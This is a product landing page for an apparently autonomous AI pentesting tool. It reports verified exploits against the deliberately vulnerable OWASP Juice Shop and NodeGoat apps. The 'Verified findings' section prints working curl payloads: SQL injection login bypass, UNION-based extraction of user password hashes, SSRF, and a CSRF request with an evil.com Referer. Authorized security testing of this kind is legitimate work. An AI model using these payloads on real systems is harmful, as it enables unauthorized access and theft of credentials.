Autonomous red-team ensemble · v0.4 preview

Pentest any web app.
No source code.
No configuration.
Just a URL.

Vexilium is a black-box AI pentester. Point it at any web app or API, and an ensemble of two engines (a deep single-session agent and a parallel red team) returns verified exploits. Every finding ships with a runnable curl. Source code never leaves your perimeter, because it's never touched.

No spam. We email once when your slot opens.

$ python -m agent.main --ensemble --target https://your-app.com
↳ ~10 minutes later
$ cat report.md
→ 11 verified exploits, 11 curl reproducers, 1 executive summary

87 seconds · live capture

One URL.
Eleven verified exploits.

Real run, sped up 10×. Captions are diegetic: the agent's own reasoning, payloads, and verifier outcomes. Nothing is cherry-picked or replayed. This capture is the deep single-engine run; the full ensemble adds a parallel red team for the numbers below.

Headline numbers

19 unique verified exploits across two web stacks, ensemble of two engines
Juice Shop 11 · NodeGoat 8

~10 min average runtime, fully autonomous, no human input
deep agent + red team

0 lines of source code accessed. Pure black-box.
vs. Shannon · vs. XBOW

Where the coverage comes from

OWASP Juice Shop

11 unique verified

deep agent 8 · red team 4 · found by both 1

OWASP NodeGoat

8 unique verified

deep agent 6 · red team 5 · found by both 3

Neither engine alone finds the full set. The deep agent's persistent session catches stateful, chained bugs (server-side JS injection → RCE), while the red team's parallel specialists catch breadth (SSRF, NoSQL injection, broken access control on endpoints the deep agent never reached). The ensemble reports their deduplicated union.
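
The union arithmetic above can be checked in a few lines of Python. This is a minimal sketch, not Vexilium's merge code: the `(vuln_class, endpoint)` dedupe key and the placeholder finding names are assumptions made for illustration. Only the counts (8 from the deep agent, 4 from the red team, 1 shared, 11 unique) come from the Juice Shop run.

```python
from collections import defaultdict


def merge_findings(by_engine):
    """Deduplicate findings across engines and tag each with its finders.

    by_engine maps an engine name to a list of (vuln_class, endpoint) keys.
    The key shape is an assumption; any stable finding identity would work.
    """
    merged = defaultdict(set)
    for engine, findings in by_engine.items():
        for key in findings:
            merged[key].add(engine)
    return dict(merged)


# Placeholder findings sized to match the Juice Shop counts:
# 8 from the deep agent, 4 from the red team, 1 of them shared.
deep = [("class-%d" % i, "/endpoint-%d" % i) for i in range(8)]
red = [deep[0]] + [("class-%d" % i, "/endpoint-%d" % i) for i in range(8, 11)]

merged = merge_findings({"deep": deep, "red team": red})
unique = len(merged)
found_by_both = sum(1 for engines in merged.values() if len(engines) == 2)
print(unique, found_by_both)
```

The same check holds for NodeGoat: 6 + 5 − 3 = 8.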

Same target. Same conditions. No human config.

Tool	Target	Runtime	Verified active exploits
Vexilium · ensemble	OWASP Juice Shop	~10 min · two engines	11
Vexilium · ensemble	OWASP NodeGoat	~10 min · two engines	8
OWASP ZAP baseline	Juice Shop	~5 min	0 (10 passive)
Nuclei v3.8 · 6,618 templates	Juice Shop	7m 32s	0 (1 passive)

Industry-standard scanners (same network, same machine, default config) found zero active exploits. Across 14,000+ requests and 6,618 templates, Nuclei matched a single passive metrics endpoint. Vexilium's ensemble landed 19 working exploits across two unrelated web stacks, spanning auth bypass, SQLi, SSRF, NoSQL injection, IDOR, CSRF, and server-side JS injection → RCE.

How it works · ensemble

Two engines. One verified union.

Recon and auth run once and share a session. Then two engines attack the same surface from different angles, one for depth, one for breadth, and a critic plus a deterministic verifier merge what survives into a single deduplicated report.

01 / RECON + AUTH

Map once. Log in once.

A recon agent fingerprints the framework and enumerates the API surface; an auth agent establishes one session and shares it on a blackboard. Every request is scope-locked to the target's host:port at the tool layer.

→ GET /api/Products
→ POST /rest/user/login (session shared)
→ scope locked: host:port
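
A scope lock of this kind could look roughly like the sketch below. It is an illustration under stated assumptions, not the product's tool layer: the function names (`origin`, `in_scope`, `guarded_request`) and the `send` callback are hypothetical, and the only rule taken from the text is that a request must match the target's host:port.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """Return (host, port) for a URL, filling in the scheme's default port."""
    parts = urlsplit(url)
    port = parts.port or DEFAULT_PORTS.get(parts.scheme)
    return (parts.hostname or "").lower(), port


def in_scope(target_url, request_url):
    """True only if request_url points at the target's exact host:port."""
    host, port = origin(target_url)
    return bool(host) and origin(request_url) == (host, port)


def guarded_request(target_url, request_url, send):
    """Call send(request_url) only for in-scope URLs; refuse everything else."""
    if not in_scope(target_url, request_url):
        raise PermissionError("out of scope: " + request_url)
    return send(request_url)
```

Putting the check inside the request helper, rather than in the prompt, means an agent cannot reason its way around it: an out-of-scope URL never reaches the network.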

02 / TWO ENGINES

Depth and breadth, in parallel.

A single deep-session agent chains multi-step attacks down one path; a red team of specialists sweeps the surface in parallel. Different angles, same target: the union is larger than either alone.

deep agent → SSJI → RCE /contributions
red team → SSRF, NoSQL, broken-access ×N
↳ low overlap, wide coverage

03 / MERGE + VERIFY

Prove it. Then dedupe.

A critic adversarially challenges every candidate; a per-class verifier rejects anything without observable exploit evidence. Survivors merge into one report, tagged by which engine found each.

VERIFIED sqli /rest/user/login [deep]
VERIFIED ssrf /research [red team]
↳ merged · 11 unique · 1 found by both
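
A per-class verifier can be as simple as a table of deterministic checks over the observed response. The sketch below is an illustration, not Vexilium's verifier: the `Candidate` shape, the class labels, and the evidence rules are all assumptions, loosely modelled on the sample findings on this page.

```python
from dataclasses import dataclass


@dataclass
class Candidate:
    vuln_class: str  # hypothetical label, e.g. "sqli-auth-bypass"
    endpoint: str
    status: int      # HTTP status of the exploit response
    body: str        # response body captured by the engine
    engine: str      # "deep" or "red team"


# One deterministic evidence rule per class (hypothetical rules).
VERIFIERS = {
    "sqli-auth-bypass": lambda c: c.status == 200 and '"token"' in c.body,
    "csrf": lambda c: c.status == 200 and "updated successfully" in c.body,
}


def verify(candidate):
    """Accept a candidate only if its class has a rule and the rule passes."""
    rule = VERIFIERS.get(candidate.vuln_class)
    return bool(rule and rule(candidate))


def report(candidates):
    """Keep verified candidates, tagged with the engine that found each."""
    return [
        "VERIFIED %s %s [%s]" % (c.vuln_class, c.endpoint, c.engine)
        for c in candidates
        if verify(c)
    ]
```

A candidate whose class has no rule is rejected rather than waved through, which keeps the default on the side of no evidence, no finding.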

The moat is the data. Every customer run logs (target_fingerprint, payload, verifier_outcome). Binary signal, not noisy chat traces. That dataset trains specialist 7B–32B models that beat frontier models on cost and latency for this narrow task. Open-source tools can replicate the agent; they cannot replicate the dataset.
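
One way to picture that log is a flat record per attempt, written as JSON Lines. This is a sketch under assumptions: the three field names come from the text above, but the `RunRecord` type, the boolean encoding of the outcome, the JSONL format, and the example fingerprint string are hypothetical.

```python
import json
from dataclasses import dataclass, asdict


@dataclass(frozen=True)
class RunRecord:
    target_fingerprint: str  # e.g. a framework/stack descriptor (format assumed)
    payload: str             # the exact payload that was sent
    verifier_outcome: bool   # binary signal: did the verifier accept it?


def to_jsonl(records):
    """Serialize records one JSON object per line, with stable key order."""
    return "\n".join(json.dumps(asdict(r), sort_keys=True) for r in records)


records = [
    RunRecord("example-stack", "' OR 1=1--", True),
    RunRecord("example-stack", "' OR 1=2--", False),
]
print(to_jsonl(records))
```

Because each line carries a payload and a pass/fail label, the file can be read directly as supervised training examples without parsing chat transcripts.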

The attack surface

Every endpoint is a pixel.
Two engines map the whole sphere.

The deep agent drills one path to the core; the red team sweeps the perimeter in parallel. Together they leave no facet untested.

Sample of last run

Verified findings.
Working curl reproducers, every time.

SQLi · auth bypass · Juice Shop · turn 6

Admin login bypassed with one string

' OR 1=1-- on /rest/user/login returns a valid admin JWT. Role admin, full access.

$ curl -X POST localhost:3000/rest/user/login \
-H 'Content-Type: application/json' \
-d '{"email":"'\'' OR 1=1--","password":"x"}'
↳ {"authentication":{"token":"eyJ0eXA..."}}

UNION SQLi · data exfil · Juice Shop · turn 13

Every user's password hash, exfiltrated

UNION SELECT on /rest/products/search leaks the full Users table: emails, MD5 hashes, roles for all 23 accounts.

$ curl -G localhost:3000/rest/products/search \
--data-urlencode "q=apple')) UNION SELECT id,email,password,role,4,5,6,7,8,9 FROM Users--"
↳ 23 rows · admin@juice-sh.op · 0192023a7bbd...

SSRF · internal proxy · NodeGoat · turn 18

Server fetches arbitrary URLs on demand

/research?url= proxies any URL through the server and returns the response, so this is full-read SSRF rather than blind: internal recon and data exfil via internal endpoints.

$ curl "localhost:4000/research?url=http://localhost:4000/dashboard"
↳ <internal dashboard HTML returned>

CSRF · state change · NodeGoat · turn 15

Cross-origin POST modifies retirement allocations

/contributions accepts forged POSTs with attacker Referer and no CSRF token. The agent quoted the commented-out fix from the page source as evidence.

$ curl -X POST localhost:4000/contributions \
-H 'Referer: http://evil.com/csrf.html' \
-d 'preTax=99&roth=0&afterTax=0'
↳ HTTP 200 · "Contributions updated successfully."

Why black-box

Source-code AI pentesters serve the easy half of the market.
We serve the rest.

vs. Shannon (white-box)

Requires source-code ingestion. Excludes external pentest, vendor-risk review, bug-bounty research, and every regulated buyer that can't ship source to a US AI vendor.

vs. XBOW (enterprise findings)

Enterprise SaaS sells reports to security teams. We ship verified exploits with curl reproducers into the developer workflow: PR-integrated, per-commit, continuous.

vs. ZAP / Nuclei (signature-based)

Passive and template-based scanners find missing headers and metrics endpoints. In the default-config runs above they did not bypass auth, exfiltrate data, or chain attacks. We consistently do all three.

Get early access.
Be first in line when Vexilium opens.

Book a 30-minute walkthrough.